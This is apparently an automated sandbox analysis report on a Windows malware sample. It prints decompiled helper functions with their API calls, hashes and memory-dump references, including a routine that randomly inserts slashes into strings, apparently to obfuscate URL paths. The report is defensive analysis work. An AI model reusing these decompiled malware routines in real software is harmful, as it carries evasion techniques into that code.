                                                  			E00EC3BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00EC9763(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00ECA022(_t23);
						}
					}
					return _t38;
				}
				if(E00ECA72D(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xecd2a8, 1, 0,  *0xecd344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00EC8A51(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00EC17D5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00EC1F99(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00EC42EA( &_v32, _t39);
					goto L13;
				}
			}












                                                  0x00ec3bf1
                                                  0x00ec3bfe
                                                  0x00ec3c04
                                                  0x00ec3c05
                                                  0x00ec3c06
                                                  0x00ec3c07
                                                  0x00ec3c08
                                                  0x00ec3c0c
                                                  0x00ec3c18
                                                  0x00ec3c1c
                                                  0x00ec3ca4
                                                  0x00ec3ca4
                                                  0x00ec3ca7
                                                  0x00ec3ca9
                                                  0x00ec3cb1
                                                  0x00ec3cb1
                                                  0x00ec3cb7
                                                  0x00ec3cba
                                                  0x00ec3cba
                                                  0x00ec3cb7
                                                  0x00ec3cc5
                                                  0x00ec3cc5
                                                  0x00ec3c2f
                                                  0x00ec3c31
                                                  0x00ec3c31
                                                  0x00ec3c48
                                                  0x00ec3c4c
                                                  0x00ec3c4f
                                                  0x00ec3c5a
                                                  0x00ec3c61
                                                  0x00ec3c61
                                                  0x00ec3c6d
                                                  0x00ec3c6e
                                                  0x00ec3c7c
                                                  0x00ec3c70
                                                  0x00ec3c70
                                                  0x00ec3c71
                                                  0x00ec3c72
                                                  0x00ec3c73
                                                  0x00ec3c74
                                                  0x00ec3c75
                                                  0x00ec3c75
                                                  0x00ec3c81
                                                  0x00ec3c86
                                                  0x00ec3c88
                                                  0x00ec3c8a
                                                  0x00ec3c8a
                                                  0x00ec3c91
                                                  0x00000000
                                                  0x00ec3c93
                                                  0x00ec3c93
                                                  0x00ec3ca0
                                                  0x00000000
                                                  0x00ec3ca0

                                                  APIs
                                                  • CreateEventA.KERNEL32(00ECD2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,00EC6880,?,00000001,?), ref: 00EC3C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,00EC6880,?,00000001,?,00000002,?,?,00EC2417,?), ref: 00EC3C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,00EC6880,?,00000001,?,00000002,?,?,00EC2417,?), ref: 00EC3C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00EC6880,?,00000001,?,00000002,?,?,00EC2417,?), ref: 00EC3C61
                                                    • Part of subcall function 00EC8A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,00EC3C81,?,00EC3C81,?,?,?,?,?,00EC3C81,?), ref: 00EC8B2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: fea542abae9a32cacfa917c7222a9cdfce6242068da1ecadc36b0a4463d3476d
                                                  • Instruction ID: 8de698a62c2757e143236b1634ba622e18c96388680b35d52f098f6ba8699c96
                                                  • Opcode Fuzzy Hash: fea542abae9a32cacfa917c7222a9cdfce6242068da1ecadc36b0a4463d3476d
                                                  • Instruction Fuzzy Hash: 7C21A172D00208ABCB10AFF58A85EEEF3B9AB44354B15942DFA11B3100D7369E478BB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC788B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E00EC788B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xecd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xecd250; // 0xdbf42606
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xecd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                  0x00ec7893
                                                  0x00ec7896
                                                  0x00ec789c
                                                  0x00ec78b4
                                                  0x00ec78b8
                                                  0x00ec78bb
                                                  0x00ec78bd
                                                  0x00ec78c0
                                                  0x00ec78c2
                                                  0x00ec78c5
                                                  0x00ec78c7
                                                  0x00ec78c7
                                                  0x00ec78c9
                                                  0x00ec78d4
                                                  0x00ec78d9
                                                  0x00ec78ea
                                                  0x00ec78f2
                                                  0x00ec78f7
                                                  0x00ec78fa
                                                  0x00ec78fd
                                                  0x00ec78ff
                                                  0x00ec7905
                                                  0x00ec7908
                                                  0x00ec7908
                                                  0x00ec7908
                                                  0x00ec7913
                                                  0x00ec7918
                                                  0x00ec7922

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00EC839A,00000000,?,?,00ECA428,?,030095B0), ref: 00EC7896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00EC78AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00EC839A,00000000,?,?,00ECA428,?,030095B0), ref: 00EC78F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 00EC7913
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 619ad0e3ea12acd1cbea58c46ce2b77fdf16612d87750fb0a922b18b2e3438e9
                                                  • Instruction ID: 0094ad1a670625e197bd8317be7b5ecf2433c0df3e52cafc1c18187518296840
                                                  • Opcode Fuzzy Hash: 619ad0e3ea12acd1cbea58c46ce2b77fdf16612d87750fb0a922b18b2e3438e9
                                                  • Instruction Fuzzy Hash: CE110A72A00114AFC7148B6ADD85E9EBBEEEB81350B15017AF505A7160E7729E06C750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC7A9A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E00EC7A9A(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00EC6B43(_t8, _t1);
				_t16 = E00EC2049(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00EC86D8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00EC2049(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00EC9039(_t16);
				}
				return _t18;
			}









                                                  0x00ec7aa5
                                                  0x00ec7aa6
                                                  0x00ec7aa9
                                                  0x00ec7aab
                                                  0x00ec7ab6
                                                  0x00ec7aba
                                                  0x00ec7abf
                                                  0x00ec7ac3
                                                  0x00ec7acb
                                                  0x00ec7ad0
                                                  0x00ec7ad8
                                                  0x00ec7ad8
                                                  0x00ec7ae1
                                                  0x00ec7ae5
                                                  0x00ec7aeb
                                                  0x00ec7aee
                                                  0x00ec7af4
                                                  0x00ec7af4
                                                  0x00ec7afc
                                                  0x00ec7afc
                                                  0x00ec7b03
                                                  0x00ec7b03
                                                  0x00ec7b0e

                                                  APIs
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                    • Part of subcall function 00EC86D8: wsprintfA.USER32 ref: 00EC8734
                                                  • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00EC96DA,74666F53,00000000,#,00ECD00C,?,00EC23E9), ref: 00EC7AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00EC7AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: 78d9c1699b804a1b6482872f3c75d484f8284bedb5da96a0b448bf3ff13e97c1
                                                  • Instruction ID: 36687de48889d184c56b2de3e9cdebc9d8594a7a4e001e34541b089fb9bd30b7
                                                  • Opcode Fuzzy Hash: 78d9c1699b804a1b6482872f3c75d484f8284bedb5da96a0b448bf3ff13e97c1
                                                  • Instruction Fuzzy Hash: 6201F732100215ABC7126BA69D86FEF3BA9EF80345F04502AFA0575111DB378E47C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC7C61, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC7C61(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                  0x00ec7c6b
                                                  0x00ec7c6f
                                                  0x00ec7c84
                                                  0x00ec7c88
                                                  0x00ec7c8b
                                                  0x00ec7c91
                                                  0x00ec7c95
                                                  0x00ec7c98
                                                  0x00ec7ca3
                                                  0x00ec7c9a
                                                  0x00ec7c9a
                                                  0x00ec7c9a
                                                  0x00ec7c98
                                                  0x00ec7cb1

                                                  APIs
                                                  • memset.NTDLL ref: 00EC7C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 00EC7C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00EC7C91
                                                  • CloseHandle.KERNEL32(?), ref: 00EC7CA3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: 67b6a716de1094384de1360adbc50c1816a1e839b6c4647109797558cb26f2b1
                                                  • Instruction ID: 739ee03aca8c03933b3bea2a8ed17a7803c940706981b76ecab8b8c55f9b498f
                                                  • Opcode Fuzzy Hash: 67b6a716de1094384de1360adbc50c1816a1e839b6c4647109797558cb26f2b1
                                                  • Instruction Fuzzy Hash: 30F03AB4104309AFD3105F22DD81D27BBACFB852E9B21993DF086A1501D633A81A9AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC75E9, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E00EC75E9(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xecd32c; // 0x30095b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xecd32c; // 0x30095b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xecd030) {
					HeapFree( *0xecd238, 0, _t8);
				}
				_t14[1] = E00EC94A9(_v0, _t14);
				_t11 =  *0xecd32c; // 0x30095b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                  0x00ec75e9
                                                  0x00ec75e9
                                                  0x00ec75f2
                                                  0x00ec7602
                                                  0x00ec7602
                                                  0x00ec7607
                                                  0x00ec760c
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec75fc
                                                  0x00ec75fc
                                                  0x00ec760e
                                                  0x00ec7612
                                                  0x00ec7624
                                                  0x00ec7624
                                                  0x00ec7634
                                                  0x00ec7637
                                                  0x00ec763c
                                                  0x00ec7640
                                                  0x00ec7646

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00EC75F2
                                                  • Sleep.KERNEL32(0000000A,?,00EC23DE), ref: 00EC75FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,00EC23DE), ref: 00EC7624
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00EC7640
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: c4ac651324f03105b920b1245bb9c43248f796e47bed40794423f87c14bf3c75
                                                  • Instruction ID: 6264ea70b4fd14ad6ed984b18f2b01ed406d4b35b7dd5a6d21ced69a5f572f89
                                                  • Opcode Fuzzy Hash: c4ac651324f03105b920b1245bb9c43248f796e47bed40794423f87c14bf3c75
                                                  • Instruction Fuzzy Hash: 95F01770A08640DFD7108B6EDE4AF0577A8EB54340B108029F846F6261D663D80BCA26
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC970F, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC970F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xecd26c; // 0x33c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xecd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xecd26c; // 0x33c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xecd238; // 0x2c10000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                  0x00ec970f
                                                  0x00ec9716
                                                  0x00ec9760
                                                  0x00ec9762
                                                  0x00ec9762
                                                  0x00ec971a
                                                  0x00ec9720
                                                  0x00ec9725
                                                  0x00ec9729
                                                  0x00ec972f
                                                  0x00ec9736
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec9738
                                                  0x00ec973d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec973d
                                                  0x00ec973f
                                                  0x00ec9747
                                                  0x00ec974a
                                                  0x00ec974a
                                                  0x00ec9750
                                                  0x00ec9757
                                                  0x00ec975a
                                                  0x00ec975a
                                                  0x00000000

                                                  APIs
                                                  • SetEvent.KERNEL32(0000033C,00000001,00EC8099), ref: 00EC971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 00EC9729
                                                  • CloseHandle.KERNEL32(0000033C), ref: 00EC974A
                                                  • HeapDestroy.KERNEL32(02C10000), ref: 00EC975A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: 50adc479e8ac933e704fa81e077513ed75dfdafd0baea89cce0311b2ab781301
                                                  • Instruction ID: 6d196a2fc94413c2fee6905a7e3f2a0169d25d12805a157988b466e8dfb28916
                                                  • Opcode Fuzzy Hash: 50adc479e8ac933e704fa81e077513ed75dfdafd0baea89cce0311b2ab781301
                                                  • Instruction Fuzzy Hash: 11F08C7071A300DFD720AF37AE8DF0A77ACAB00754B140234B809F32A1DA23D80BA650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00ECA5D6, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E00ECA5D6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xecd32c; // 0x30095b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xecd32c; // 0x30095b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xecd32c; // 0x30095b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xece836) {
					HeapFree( *0xecd238, 0, _t10);
					_t7 =  *0xecd32c; // 0x30095b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                  0x00eca5d6
                                                  0x00eca5df
                                                  0x00eca5ef
                                                  0x00eca5ef
                                                  0x00eca5f4
                                                  0x00eca5f9
                                                  0x00000000
                                                  0x00000000
                                                  0x00eca5e9
                                                  0x00eca5e9
                                                  0x00eca5fb
                                                  0x00eca600
                                                  0x00eca604
                                                  0x00eca617
                                                  0x00eca61d
                                                  0x00eca61d
                                                  0x00eca626
                                                  0x00eca628
                                                  0x00eca62c
                                                  0x00eca632

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(03009570), ref: 00ECA5DF
                                                  • Sleep.KERNEL32(0000000A,?,00EC23DE), ref: 00ECA5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,00EC23DE), ref: 00ECA617
                                                  • RtlLeaveCriticalSection.NTDLL(03009570), ref: 00ECA62C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 4dc1a364ec934bdea8ddfd2e6dfdebda08aaf0d27f349a46297d06df9aaf2808
                                                  • Instruction ID: 5155ef9b7d85b45d4191e2cdd8b8fafa04c333a60a99a5c7e4a599a9e59dd52f
                                                  • Opcode Fuzzy Hash: 4dc1a364ec934bdea8ddfd2e6dfdebda08aaf0d27f349a46297d06df9aaf2808
                                                  • Instruction Fuzzy Hash: 14F0D474A04240DFE7188B2ADD5AF1577A5EB48309B188039E806FB371C737EC0ACE26
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC7F27, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00EC7F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00EC2049(_t2);
				if(_t34 != 0) {
					_t30 = E00EC2049(_t28);
					if(_t30 == 0) {
						E00EC9039(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00ECA911(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00ECA911(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                  0x00ec7f27
                                                  0x00ec7f31
                                                  0x00ec7f33
                                                  0x00ec7f39
                                                  0x00ec7f39
                                                  0x00ec7f42
                                                  0x00ec7f46
                                                  0x00ec7f52
                                                  0x00ec7f56
                                                  0x00ec7fca
                                                  0x00ec7f58
                                                  0x00ec7f58
                                                  0x00ec7f5c
                                                  0x00ec7f63
                                                  0x00ec7f66
                                                  0x00ec7f80
                                                  0x00ec7f6f
                                                  0x00ec7f6f
                                                  0x00ec7f73
                                                  0x00ec7f76
                                                  0x00ec7f7b
                                                  0x00ec7f7b
                                                  0x00ec7f85
                                                  0x00ec7fad
                                                  0x00ec7fb3
                                                  0x00ec7fb6
                                                  0x00ec7f87
                                                  0x00ec7f89
                                                  0x00ec7f91
                                                  0x00ec7f9c
                                                  0x00ec7fa1
                                                  0x00ec7fa1
                                                  0x00ec7fbd
                                                  0x00ec7fc4
                                                  0x00ec7fc5
                                                  0x00ec7fc5
                                                  0x00ec7f56
                                                  0x00ec7fd5

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?,?,00000000), ref: 00EC7F33
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                    • Part of subcall function 00ECA911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00EC7F61,00000000,00000001,00000001,?,?,00EC15A4,?,?,?,?,00000102), ref: 00ECA91F
                                                    • Part of subcall function 00ECA911: StrChrA.SHLWAPI(?,0000003F,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?,?,00000000,00000000), ref: 00ECA929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00EC15A4,?,?,?,?,00000102,00EC11DA,?), ref: 00EC7F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00EC7FAD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 4042b1d5e15390beb4592ffda8d7b0ec1868a9a35ba557b144fd79583673fced
                                                  • Instruction ID: 22233382615218b3f473b188af4bd7c342f65313b128b2c8c39c89937caf7ae8
                                                  • Opcode Fuzzy Hash: 4042b1d5e15390beb4592ffda8d7b0ec1868a9a35ba557b144fd79583673fced
                                                  • Instruction Fuzzy Hash: 84212332508245EFCB129FA5CD85FAE7FE8AF06344B15506DFD44AB201D632C9028BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC3CC8, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlen.KERNEL32(030087FA,00000000,00000000,74ECC740,00ECA453,00000000), ref: 00EC3CD8
                                                  • lstrlen.KERNEL32(?), ref: 00EC3CE0
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • lstrcpy.KERNEL32(00000000,030087FA), ref: 00EC3CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00EC3CFF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
